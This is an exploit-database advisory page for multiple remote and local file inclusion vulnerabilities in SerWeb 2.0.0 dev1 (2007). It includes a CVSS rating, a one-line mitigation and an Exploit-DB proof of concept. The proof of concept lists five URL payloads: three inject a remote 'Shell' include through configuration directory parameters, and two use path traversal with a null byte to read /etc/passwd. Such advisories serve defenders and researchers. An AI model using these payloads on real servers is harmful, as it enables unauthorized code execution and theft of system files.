header-logo
Suggest Exploit
vendor:
SerWeb
by:
Unknown
7.5
CVSS
HIGH
RFI / LFI
22
CWE
Product Name: SerWeb
Affected Version From: 2.0.0 dev1 2007-02-20
Affected Version To: 2.0.0 dev1 2007-02-20
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

SerWeb <= 2.0.0 dev1 2007-02-20 Multiple RFI / LFI Vulnerabilities

Multiple Remote File Inclusion (RFI) and Local File Inclusion (LFI) vulnerabilities in SerWeb version 2.0.0 dev1 2007-02-20 allow attackers to include arbitrary files from remote servers or local file system, which could lead to remote code execution or unauthorized access to sensitive information.

Mitigation:

Update to a patched version of SerWeb or apply appropriate security measures to prevent file inclusion attacks.
Source

Exploit-DB raw data:

SerWeb <= 2.0.0 dev1 2007-02-20 Multiple RFI / LFI Vulnerabilities
D.Script : http://ftp.iptel.org/pub/serweb/daily-snapshots/serweb-2.0.0-dev1_2007-02-20.tar.gz
POC:
    /load_lang.php?_SERWEB[configdir]=Shell
    /main_prepend.php?_SERWEB[functionsdir]=Shell
    /load_phplib.php?_PHPLIB[libdir]=Shell
    /js/get_js.php?mod=../../../../../../../etc/passwd%00
    /js/get_js.php?js=../../../../../../../etc/passwd%00

# milw0rm.com [2007-12-06]

Navigation

Suggest Exploit

Services By CQR